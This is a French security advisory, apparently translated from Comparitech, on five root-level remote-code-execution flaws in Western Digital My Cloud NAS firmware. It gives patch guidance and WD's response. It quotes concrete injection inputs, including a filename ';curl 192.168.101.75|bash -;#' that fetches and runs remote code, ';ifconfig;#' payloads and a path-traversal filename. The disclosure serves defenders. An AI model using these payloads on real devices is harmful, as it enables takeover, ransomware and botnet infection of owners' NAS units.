Faille de sécurité détectée affectant plus de 80 000 appareils Western Digital My Cloud NAS. Mettez à jour maintenant!
L’équipe de recherche en sécurité de Comparitech a découvert que plus de 80 000 appareils de stockage en réseau (NAS) Western Digital sont connectés à l’Internet public et pourraient être vulnérables. Les vulnérabilités permettraient aux attaquants d'effectuer plusieurs attaques d'exécution de code à distance. Ces attaques pourraient compromettre les données et les fichiers stockés sur l'appareil, ou permettre à un attaquant d'installer des logiciels malveillants sur l'appareil, notamment des ransomwares, des cryptomineurs et des botnets.
Les propriétaires d'appareils NAS Western Digital doivent mettre à jour leur micrologiciel dès que possible. Nos chercheurs ont signalé les vulnérabilités de Western Digital début septembre 2020, et la société a publié une mise à jour qui les a corrigées le 27 octobre 2020.La mise à jour n'est pas automatique. Les utilisateurs doivent le lancer manuellement via l’interface d’administration de l’appareil.
Nos chercheurs ont examiné la version 2.40.155 du micrologiciel du NAS, publiée le 27 juillet 2020. Les versions antérieures pourraient également être concernées. Les cinq vulnérabilités ont été documentées comme les CVE suivants :
- CVE-2020-25765
- CVE-2020-27158
- CVE-2020-27159
- CVE-2020-27160
- CVE-2020-27744
Nous détaillerons chacun d’eux ci-dessous.
Western Digital a donné aux chercheurs de Comparitech la réponse suivante par courrier électronique :
« My Cloud Firmware 5.04.114 est une version de sécurité majeure contenant des mises à jour pour aider à améliorer la sécurité de vos appareils My Cloud. De nombreuses modifications ont été apportées au système d'exploitation afin d'améliorer considérablement sa sécurité et d'améliorer l'expérience utilisateur pour prendre en charge nos dernières technologies. Le système d'exploitation de base a été mis à niveau pour s'aligner sur les mises à jour de sécurité et de stabilité de Debian 10 « Buster ». Pour plus d’informations sur les dernières mises à jour de sécurité, consultez notre avis de sécurité : https://www.westerndigital.com/support/productsecurity/wdc-20007-my-cloud-firmware-version-5-04-114 et notes de version : https://os5releasenotes.mycloud.com/#/
Pour obtenir des instructions sur la mise à niveau de votre appareil, consultez l'article basé sur les connaissances : https://support-en.wd.com/app/answers/detail/a_id/29813
Tous les appareils ne sont pas éligibles à la mise à niveau. Nous vous recommandons de mettre à jour immédiatement si votre appareil est éligible. Pour ceux dont les appareils ne sont pas éligibles, veuillez noter : Si vous avez activé l'accès à distance au tableau de bord, nous vous recommandons de désactiver immédiatement l'accès à distance au tableau de bord . Pour plus d'informations sur la façon de procéder, consultez : https://support-en.wd.com/app/answers/detail/a_id/2573
Produits éligibles à la mise à niveau :
- Mon Cloud Miroir Gen2
- Mon Cloud EX2 Ultra
- Mon Cloud EX4100
- Mon Cloud PR2100
- Mon Cloud PR4100
Si votre appareil ne figure pas dans la liste ci-dessus, veuillez consulter notre liste d'état de support des logiciels de produits WD : https://support-en.wd.com/app/answers/detail/a_id/28740/kw/Software%20support%20status#mycloudnet
Si votre produit est au statut « Fin des mises à jour », veuillez envisager d'acheter un nouvel appareil. »
Les entreprises et les particuliers utilisent des périphériques de stockage en réseau (NAS) pour configurer un stockage cloud sur site accessible depuis Internet. Cela pourrait inclure les petites entreprises qui sauvegardent des informations clients et financières sensibles et les personnes qui sauvegardent leurs téléphones et leurs médias, entre autres.
Nos chercheurs préviennent que les appareils NAS vulnérables pourraient être détournés par un botnet pour lancer des attaques par déni de service distribué (DDoS). Logiciel malveillant botnet comme Mirai cible les appareils Internet des objets tels que les NAS, ainsi que les appareils photo, les téléviseurs intelligents et les imprimantes. L’administrateur du botnet peut ensuite utiliser leurs ressources combinées pour surcharger les cibles (sites Web, services en ligne, applications, etc.) avec du trafic Internet indésirable.
Vulnérabilités
Nos chercheurs se sont concentrés surexécution de code à distancevulnérabilités. Ils ont extrait le code de l’interface Web du micrologiciel de Western Digital et ont trouvé ce qui suit :
CVE-2020-25765
Un script PHP est utilisé pour activer un périphérique NAS pour la première fois ou après une réinitialisation matérielle. Le script tente de valider l'entrée de l'utilisateur en la convertissant en entier et en vérifiant si la valeur convertie est toujours un entier. Cependant, toute chaîne saisie renverra zéro, ce qui répond à la condition de validation et pourrait permettre à un attaquant d'injecter des commandes malveillantes exécutées par lesystème()fonction.
La vulnérabilité existe dans/web/pages/php/reg_device.php,qui peut être exploité même si l’appareil a déjà été enregistré. L'application convertit les entrées de l'utilisateur en un entier. Lorsque l'entrée est une chaîne, la conversion génère toujours zéro, ce qui est accepté comme entrée valide pour la fonction PHP.est_int(). L'attaquant peut définir le paramètre « code » envoyé via la requête POST pour'2405;ifconfig;#‘ pour exécuter des commandes arbitraires avec les privilèges root.
CVE-2020-27158
Le mécanisme de mise à jour du micrologiciel du NAS permet aux utilisateurs de mettre à jour leur micrologiciel en téléchargeant un fichier. Pendant le téléchargement, le périphérique NAS écrit le nom du micrologiciel téléchargé dans un fichier temporaire et le lit pendant le processus de mise à jour. En raison d'une vérification insuffisante des entrées utilisateur, un attaquant pourrait écrire des commandes malveillantes dans le nom du fichier. La commande sera ajoutée et déclenchée pendant le processus de mise à jour et exécutée avec les privilèges root.
La vulnérabilité existe dans/web/pages/cgi_api.phpoù les mises à jour du micrologiciel sont téléchargées. L'application accepte les demandes de téléchargement de fichiers si lecmdle paramètre est réglé surcgi_firmware_upload, qui peut être manipulé. Un attaquant peut télécharger un fichier portant le nom de fichier;curl 192.168.101.75|bash -;#,qui sera écrit à/tmp/upload_fw_msgpuis relu et exécuté si lecmdle paramètre est réglé surcgi_firmware_upload.
CVE-2020-27159
L’implémentation DsdkProxy de l’application est sujette à une vulnérabilité d’exécution de code en raison de contrôles insuffisants des entrées utilisateur. Un attaquant peut ajouter cette entrée aux commandes exécutées sans aucune vérification ni validation. Pour l'exploiter, un attaquant doit simplement envoyer une requête POST avec une charge utile dans le corps. La commande exécutée sera modifiée au choix de l’attaquant. Les développeurs ont essayé de nettoyer la commande finale exécutée en utilisant escapeshellarg(), mais cela ne fera aucune différence ni ne sécurisera le code, car l'attaquant y a déjà modifié et ajouté ses propres commandes.
La vulnérabilité existe dans/web/pages/dsdk/DsdkProxy.php.L'attaquant peut envoyer des requêtes POST via php://input avec';ifconfig;#dans le corps pour écraser et exécuter des commandes avec les privilèges root.
CVE-2020-27160
Le périphérique NAS tente de lire une URL menant à un serveur de téléchargement sur le périphérique. Les attaquants peuvent abuser de la traversée de répertoires dans la fonction de téléchargement de fichiers de WD pour écraser le fichier situé à cette URL. L’attaque est rendue possible en raison d’une vérification insuffisante des entrées utilisateur. Le nouveau fichier peut contenir des commandes système malveillantes exécutées lors de la navigation vers/web/pages/dsdk/AvailableApps.php. Cela permet à un attaquant d'exécuter la commande tant que le fichier contient les commandes malveillantes. Les chercheurs affirment que ce piratage peut aider les attaquants à maintenir un accès dérobé aux périphériques NAS.
La vulnérabilité existe dans/web/pages/dsdk/AvailableApps.php. L'application lit/tmp/docker_apps_serverfichier et ajoute son contenu au$curlCommandvariable. Un attaquant pourrait écraser le contenu de ce fichier avec des commandes qui seraient ensuite exécutées. Pour écraser le fichier, l'attaquant pourrait utiliser soit la fonction de téléchargement du micrologiciel, soit cgi_api.php, qui sont tous deux sujets à la traversée de répertoires comme indiqué dans les vulnérabilités précédentes. Par exemple, le nom du fichier téléchargé pourrait être'../../../../../../tmp/docker_apps_server', ce qui écraserait le fichier.
CVE-2020-27744
Un attaquant pourrait abuser de cette vulnérabilité pour exécuter des commandes en manipulant les entrées utilisateur envoyées à un script PHP. L'entrée de l'utilisateur n'est pas validée lors de l'appel de certaines fonctions PHP résidant en binaire, permettant à un attaquant d'ajouter des commandes et d'exécuter du code arbitraire en tant qu'utilisateur root. Cette vulnérabilité est exploitable même si l'utilisateur dispose du niveau de privilèges le plus bas sur le périphérique NAS.
La vulnérabilité existe dans le binaire /usrsbin/ftp_download. Un attaquant peut exécuter des commandes en manipulant les entrées de l'utilisateur dans/web/addons/jqueryFileTree.php.Le script est à l'abri de l'injection de commandes mais accepte les paramètres de commande et les transmet aupopen()fonction dans le binaire. Le$hôtela variable, qui provient de la saisie de l'utilisateur, n'est pas validée lors de l'appelHôteVersIP(),une fonction externe définie dans le/usrlib/libscheddl.sobibliothèque partagée. Un attaquant pourrait ajouter ses commandes et exécuter du code arbitraire avec les privilèges root.
Comment puis-je protéger mon appareil WD NAS ?
Les propriétaires d'appareils NAS Western Digital doivent télécharger et installer les dernières mises à jour de sécurité. Western Digital a déjà publié un correctif pour toutes les vulnérabilités ci-dessus. Il devrait être disponible via l’interface d’administration de l’appareil.
De plus, les chercheurs recommandent de configurer un accès exclusif à votre appareil NAS via un VPN. Limiter l'accès via un VPN protégera également votre NAS contre des attaques similaires à l'avenir.